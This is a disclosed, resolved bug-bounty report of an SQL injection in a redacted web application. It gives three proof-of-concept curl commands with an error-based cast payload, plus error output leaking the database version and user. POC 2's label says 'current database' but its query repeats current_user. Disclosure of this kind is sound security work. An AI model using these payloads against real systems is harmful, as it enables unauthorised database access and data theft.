SQL Injection in █████
Critical
Vulnerability Details
## References
## Impact
By using SQL injection, an attacker can exfiltrate the whole database, and gain RCE
## System Host(s)
████
## Affected Product(s) and Version(s)
████
## CVE Numbers
## Steps to Reproduce
POC 1 - curl command injecting query, returning database version:
curl https://█████████ -X POST -data="url=%2F████████&███████=AA'+OR(cast(version as date))LIKE'A" -k
POC 2 - curl command injecting query, returning current database:
curl https://███████████████ -X POST -data="url=%2F██████████&███=AA'+OR(cast(current_user as date))LIKE'A" -k
{"msg":"fail","err":"ERROR: invalid input syntax for type timestamp: \"████\""}
POC 3 - curl command injecting query, returning current user:
curl https://█████████ -X POST -data="url=%2F████&█████=AA'+OR(cast(current_user as date))LIKE'A" -k
{"msg":"fail","err":"ERROR: invalid input syntax for type timestamp: \"███████\""}
## Suggested Mitigation/Remediation Actions
The vulnerable parameter "█████" in the ████████ endpoint should be sanitized properly. Usually this is done by implementing prepared statement.
Actions
View on HackerOneReport Stats
- Report ID: 1489744
- State: Closed
- Substate: resolved
- Upvotes: 7